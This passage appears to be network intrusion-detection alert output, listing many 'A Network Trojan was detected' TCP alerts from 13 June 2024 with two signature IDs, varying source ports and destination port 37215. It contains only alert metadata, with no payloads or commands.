              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.528114
              SID:2835222
              Source Port:34484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.238712
              SID:2835222
              Source Port:47214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658121
              SID:2829579
              Source Port:38244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823111
              SID:2829579
              Source Port:36874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093920
              SID:2835222
              Source Port:58340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457052
              SID:2829579
              Source Port:37064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.372517
              SID:2835222
              Source Port:56126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485324
              SID:2835222
              Source Port:50894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.305848
              SID:2829579
              Source Port:44278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.271084
              SID:2829579
              Source Port:33796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.837089
              SID:2835222
              Source Port:33748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.475748
              SID:2829579
              Source Port:35176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696269
              SID:2835222
              Source Port:54432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.821645
              SID:2829579
              Source Port:47006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.945778
              SID:2835222
              Source Port:47374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.198591
              SID:2835222
              Source Port:51254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.420815
              SID:2835222
              Source Port:37232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545336
              SID:2829579
              Source Port:59826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.240584
              SID:2829579
              Source Port:34268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.569597
              SID:2829579
              Source Port:41022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.246018
              SID:2835222
              Source Port:50156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.978030
              SID:2835222
              Source Port:48936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612129
              SID:2835222
              Source Port:37116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.459120
              SID:2829579
              Source Port:52768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.802117
              SID:2835222
              Source Port:51094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.316139
              SID:2835222
              Source Port:46736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.528194
              SID:2835222
              Source Port:45498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358390
              SID:2835222
              Source Port:39548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488373
              SID:2835222
              Source Port:42674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.671816
              SID:2835222
              Source Port:51310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.888277
              SID:2829579
              Source Port:58498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223687
              SID:2829579
              Source Port:50482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222430
              SID:2835222
              Source Port:41716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545693
              SID:2835222
              Source Port:34570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.304513
              SID:2835222
              Source Port:38290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.371660
              SID:2835222
              Source Port:42238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755698
              SID:2835222
              Source Port:57700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403543
              SID:2835222
              Source Port:41222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.128503
              SID:2829579
              Source Port:36644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214290
              SID:2835222
              Source Port:51836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.633314
              SID:2835222
              Source Port:33282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.872372
              SID:2835222
              Source Port:39968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090232
              SID:2829579
              Source Port:53022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.782195
              SID:2835222
              Source Port:54830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823143
              SID:2829579
              Source Port:41816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039570
              SID:2835222
              Source Port:59426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408187
              SID:2835222
              Source Port:36244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726692
              SID:2835222
              Source Port:41848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.134278
              SID:2835222
              Source Port:33620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197865
              SID:2829579
              Source Port:54294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027682
              SID:2829579
              Source Port:36546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.451399
              SID:2829579
              Source Port:35864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241602
              SID:2829579
              Source Port:53440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.803562
              SID:2829579
              Source Port:52770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.097683
              SID:2829579
              Source Port:41102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.011370
              SID:2835222
              Source Port:48354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.458433
              SID:2835222
              Source Port:35394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.175884
              SID:2835222
              Source Port:60200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.112174
              SID:2829579
              Source Port:54716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245059
              SID:2829579
              Source Port:53362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485738
              SID:2835222
              Source Port:53440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.679390
              SID:2829579
              Source Port:40438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.014597
              SID:2829579
              Source Port:33930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453025
              SID:2835222
              Source Port:53348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.370433
              SID:2829579
              Source Port:58460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402997
              SID:2835222
              Source Port:58068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942405
              SID:2829579
              Source Port:36214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.632933
              SID:2829579
              Source Port:44014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.993825
              SID:2835222
              Source Port:50164
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.303864
              SID:2829579
              Source Port:33160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.124652
              SID:2829579
              Source Port:42992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.265034
              SID:2835222
              Source Port:37820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302076
              SID:2829579
              Source Port:46908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.564310
              SID:2829579
              Source Port:36378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.248271
              SID:2835222
              Source Port:54550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.908611
              SID:2829579
              Source Port:46438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092916
              SID:2829579
              Source Port:39344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.672234
              SID:2829579
              Source Port:60496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.376302
              SID:2835222
              Source Port:49020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358433
              SID:2829579
              Source Port:42050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.308209
              SID:2835222
              Source Port:47698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.374846
              SID:2829579
              Source Port:59318
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.460143
              SID:2829579
              Source Port:47046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.787098
              SID:2835222
              Source Port:40166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.458303
              SID:2829579
              Source Port:35658
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.125554
              SID:2829579
              Source Port:42210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.886820
              SID:2829579
              Source Port:35716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.633024
              SID:2835222
              Source Port:37806
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440666
              SID:2829579
              Source Port:39344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.112448
              SID:2829579
              Source Port:33172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913347
              SID:2829579
              Source Port:51984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836020
              SID:2829579
              Source Port:53026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547274
              SID:2829579
              Source Port:44474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.568198
              SID:2835222
              Source Port:36654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.224013
              SID:2835222
              Source Port:45380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093021
              SID:2835222
              Source Port:41864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.238577
              SID:2835222
              Source Port:59274
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.937311
              SID:2835222
              Source Port:45540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.820351
              SID:2835222
              Source Port:50854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422316
              SID:2835222
              Source Port:54712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.676952
              SID:2835222
              Source Port:58034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835327
              SID:2829579
              Source Port:56618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.724563
              SID:2829579
              Source Port:55270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.180963
              SID:2835222
              Source Port:50316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754526
              SID:2829579
              Source Port:33094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.724781
              SID:2829579
              Source Port:39706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.099910
              SID:2829579
              Source Port:50876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.419873
              SID:2829579
              Source Port:56412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.629070
              SID:2835222
              Source Port:60246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.347124
              SID:2835222
              Source Port:50562
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075211
              SID:2835222
              Source Port:44348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.230074
              SID:2829579
              Source Port:34852
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.310515
              SID:2835222
              Source Port:40792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253844
              SID:2835222
              Source Port:58754
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.452525
              SID:2835222
              Source Port:52620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.294241
              SID:2829579
              Source Port:38030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.180577
              SID:2835222
              Source Port:32988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.297189
              SID:2829579
              Source Port:58112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217739
              SID:2829579
              Source Port:41630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.368717
              SID:2835222
              Source Port:50642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.569145
              SID:2829579
              Source Port:33352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.175421
              SID:2835222
              Source Port:47824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544497
              SID:2835222
              Source Port:48728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.678529
              SID:2835222
              Source Port:48602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.198292
              SID:2835222
              Source Port:42270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710678
              SID:2835222
              Source Port:53096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196183
              SID:2829579
              Source Port:53336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612411
              SID:2829579
              Source Port:43258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869322
              SID:2835222
              Source Port:47570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.872289
              SID:2835222
              Source Port:48350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.475941
              SID:2829579
              Source Port:58068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.339555
              SID:2829579
              Source Port:47768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.993862
              SID:2835222
              Source Port:32916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.475896
              SID:2835222
              Source Port:46222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.110311
              SID:2835222
              Source Port:51280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.054817
              SID:2835222
              Source Port:45208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424255
              SID:2829579
              Source Port:55386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.215381
              SID:2829579
              Source Port:51724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754588
              SID:2835222
              Source Port:39338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.345846
              SID:2829579
              Source Port:37656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913203
              SID:2835222
              Source Port:35766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502554
              SID:2835222
              Source Port:60144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.502312
              SID:2835222
              Source Port:59990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039244
              SID:2835222
              Source Port:45218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404009
              SID:2829579
              Source Port:40262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730329
              SID:2829579
              Source Port:41816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129769
              SID:2829579
              Source Port:46644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.607654
              SID:2835222
              Source Port:52372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.074373
              SID:2835222
              Source Port:49048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.099204
              SID:2829579
              Source Port:43366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669952
              SID:2835222
              Source Port:48856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914738
              SID:2829579
              Source Port:57758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.254628
              SID:2835222
              Source Port:54640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.604408
              SID:2835222
              Source Port:34242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729166
              SID:2829579
              Source Port:39744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610450
              SID:2835222
              Source Port:45482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.055889
              SID:2835222
              Source Port:60510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543023
              SID:2829579
              Source Port:33348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.126759
              SID:2829579
              Source Port:43170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077483
              SID:2829579
              Source Port:43652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755554
              SID:2829579
              Source Port:32960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.937360
              SID:2829579
              Source Port:54050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.569899
              SID:2829579
              Source Port:60468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169235
              SID:2829579
              Source Port:38044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545865
              SID:2829579
              Source Port:35518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.181046
              SID:2829579
              Source Port:40416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220569
              SID:2835222
              Source Port:60268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212803
              SID:2835222
              Source Port:52442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027564
              SID:2829579
              Source Port:50028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.785303
              SID:2835222
              Source Port:45496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725233
              SID:2829579
              Source Port:52464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.012158
              SID:2829579
              Source Port:36434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.225039
              SID:2835222
              Source Port:52582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100246
              SID:2835222
              Source Port:42044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.508818
              SID:2835222
              Source Port:55942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.074446
              SID:2829579
              Source Port:55218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.415650
              SID:2835222
              Source Port:53694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.196512
              SID:2835222
              Source Port:47108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027984
              SID:2829579
              Source Port:43492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.321259
              SID:2835222
              Source Port:41834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093757
              SID:2829579
              Source Port:52136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.415414
              SID:2829579
              Source Port:58296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611501
              SID:2835222
              Source Port:46492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245111
              SID:2835222
              Source Port:46652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.378607
              SID:2835222
              Source Port:52480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.883983
              SID:2829579
              Source Port:47546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220938
              SID:2835222
              Source Port:34822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.945349
              SID:2835222
              Source Port:33126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357266
              SID:2835222
              Source Port:34440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.400845
              SID:2835222
              Source Port:54082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.155437
              SID:2829579
              Source Port:35684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.107826
              SID:2829579
              Source Port:48850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349409
              SID:2835222
              Source Port:33870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.800648
              SID:2835222
              Source Port:55604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.508215
              SID:2829579
              Source Port:48756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.995989
              SID:2829579
              Source Port:36642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.693915
              SID:2835222
              Source Port:55410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
